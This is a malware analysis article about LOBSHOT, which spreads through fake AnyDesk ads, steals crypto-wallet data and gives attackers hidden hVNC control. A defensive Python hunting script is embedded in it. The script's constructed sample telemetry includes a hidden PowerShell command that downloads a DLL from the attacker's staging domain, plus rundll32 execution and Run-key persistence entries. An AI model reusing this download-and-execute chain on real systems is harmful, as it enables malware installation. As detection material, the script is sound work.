LOBSHOT Malware


A new malware threat called LOBSHOT has been found being distributed through Google Ads; once on a Windows device, it gives the attackers hidden remote access through hVNC. Cybersecurity researchers observed the malware being promoted by ads posing as the legitimate AnyDesk remote management software. The malicious ads instead lead users to a fake website that pushes a malicious MSI file, which in turn executes a PowerShell command. The goal is to download a DLL from download-cdn[.]com, a domain previously associated with the cybercriminal activities of the TA505/Clop ransomware group.

The downloaded DLL is the LOBSHOT malware. It is saved in the C:\ProgramData folder and executed with RunDLL32.exe. According to the report that revealed the details of LOBSHOT, the researchers have observed over 500 unique LOBSHOT samples since July 2022. The identified samples are typically compiled as 32-bit DLLs or 32-bit executables between 93 KB and 124 KB in size. Once executed on a breached device, LOBSHOT checks whether Microsoft Defender is running and terminates its own execution if it is.

Cybercriminals Exploit Google Ads to Distribute Malware Threats

Cybersecurity experts have observed a substantial surge in threat actors' use of Google Ads to spread malware through search results. The malicious advertising campaigns imitated the websites of legitimate software products such as 7-Zip, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus and several other applications.

Despite the impression of legitimacy given by the ads, the websites they redirect to are designed to disseminate malware, including Gozi, RedLine, Vidar, Cobalt Strike, SectopRAT and the Royal ransomware, instead of providing the genuine applications.

The LOBSHOT Malware Targets Cryptocurrency Extensions and Wallets

If LOBSHOT finds no sign of Microsoft Defender, it proceeds with its malicious routine. The threat configures Registry entries so that it starts on every Windows boot. LOBSHOT then collects and begins transmitting system information, including the list of running processes, from the infected device. It also looks for the presence of 32 Chrome cryptocurrency wallet extensions, nine Edge wallet extensions and 11 Firefox wallet extensions.
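The delivery chain described earlier (installer MSI, PowerShell download from download-cdn[.]com, DLL dropped in C:\ProgramData and run by rundll32.exe) and the Registry autostart entry described just above both leave traces in endpoint telemetry. The Python below is an added hunting example written for this page; it is not code from the report or from the malware. It runs a few rules over constructed Sysmon-style process-creation (Event ID 1) and registry value-set (Event ID 13) records and correlates the msiexec -> powershell -> rundll32 ancestry. The event records, process IDs, the DLL name x.dll, the Run value name and the exact PowerShell command line are all constructed for the example; only the staging domain, the drop folder and the loader come from the write-up.

```python
"""Hunting example for the LOBSHOT delivery chain and Run-key persistence.

SAMPLE_EVENTS below are constructed to look like Sysmon process-creation
(EventID 1) and registry value-set (EventID 13) records; they are not real
telemetry. Indicators taken from the write-up: download-cdn[.]com as the
staging domain, C:\\ProgramData as the drop folder, rundll32.exe as loader.
"""
import re

STAGING_DOMAIN = "download-cdn.com"        # defanged in the write-up
DROP_DIR = "c:\\programdata\\"             # DLL drop folder from the write-up
RUN_KEYS = (                               # autostart locations, lower-cased
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
DLL_IN_DROP_DIR = re.compile(r"c:\\programdata\\[^\s,]+\.dll")

# Constructed sample: x.dll, the PIDs, the Run value name "Update" and the
# command lines are made up; only the shape of the chain follows the report.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\bob\Downloads\AnyDesk.msi" /qn'},
    {"EventID": 1, "ProcessId": 4188, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"powershell.exe -w hidden -c (New-Object Net.WebClient)"
                    r".DownloadFile('https://download-cdn.com/x.dll','C:\ProgramData\x.dll')"},
    {"EventID": 1, "ProcessId": 4200, "ParentProcessId": 4188,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    {"EventID": 13, "ProcessId": 4200,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    # Benign noise: Windows itself runs rundll32 constantly, so the rule
    # keys on the DLL path under ProgramData rather than on rundll32 alone.
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def _lower(value):
    return (value or "").lower()


def flag_event(ev):
    """Return the names of the rules a single event matches."""
    hits = []
    if ev["EventID"] == 1:
        img, parent = _lower(ev["Image"]), _lower(ev["ParentImage"])
        cmd = _lower(ev["CommandLine"])
        if img.endswith("\\powershell.exe") and STAGING_DOMAIN in cmd:
            hits.append("powershell_contacts_staging_domain")
        if img.endswith("\\powershell.exe") and parent.endswith("\\msiexec.exe"):
            hits.append("msiexec_spawns_powershell")
        if img.endswith("\\rundll32.exe") and DLL_IN_DROP_DIR.search(cmd):
            hits.append("rundll32_loads_dll_from_programdata")
    elif ev["EventID"] == 13:
        target, details = _lower(ev["TargetObject"]), _lower(ev["Details"])
        if any(k in target for k in RUN_KEYS) and DROP_DIR in details:
            hits.append("run_key_points_into_programdata")
    return hits


def hunt(events):
    """Run every rule over every event; return (rule, ProcessId) pairs."""
    return [(rule, ev["ProcessId"]) for ev in events for rule in flag_event(ev)]


def delivery_chain(events):
    """Correlate the ancestry msiexec -> powershell -> rundll32 loading a DLL
    from the drop folder. Returns the three PIDs in that order, else None."""
    procs = {ev["ProcessId"]: ev for ev in events if ev["EventID"] == 1}
    for ev in procs.values():
        if "rundll32_loads_dll_from_programdata" not in flag_event(ev):
            continue
        ps = procs.get(ev["ParentProcessId"])
        if ps is None or not _lower(ps["Image"]).endswith("\\powershell.exe"):
            continue
        msi = procs.get(ps["ParentProcessId"])
        if msi is not None and _lower(msi["Image"]).endswith("\\msiexec.exe"):
            return [msi["ProcessId"], ps["ProcessId"], ev["ProcessId"]]
    return None


if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
    print("delivery chain:", delivery_chain(SAMPLE_EVENTS))
```

The registry rule matches any Run or RunOnce key under any hive and any value name, because the write-up only states that LOBSHOT adds autostart Registry entries without naming the key. Since the sample terminates when it finds Microsoft Defender running, the PowerShell download from the staging domain and the msiexec-to-PowerShell parent relationship may be the only events left on a host where the loader never reached the persistence stage.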

Upon detecting these extensions, the malware executes a file in the C:\ProgramData folder. Researchers are uncertain, however, whether the purpose of that file is to extract extension data or to perform some other harmful action.

Although harvesting cryptocurrency extensions is a common goal for malware, LOBSHOT also incorporates an hVNC module, which lets the threat actors access an infected device remotely and covertly.

The LOBSHOT Malware Provides Remote Access to the Breached Devices

The hVNC (hidden virtual network computing) module makes it possible to remotely control a Windows desktop computer without the victim's knowledge. LOBSHOT's hVNC module lets the threat actors manipulate a hidden desktop as if they were physically sitting in front of it, using their own keyboard and mouse.

Once the module is activated, the victim's machine begins transmitting screen captures of the hidden desktop to a listening client controlled by the attacker. The attacker interacts through that client by typing on the keyboard, clicking buttons and moving the mouse, which gives them complete remote control of the device.

With the full access granted by hVNC, the threat actors can carry out various activities, such as executing commands, stealing data and deploying additional malware payloads.
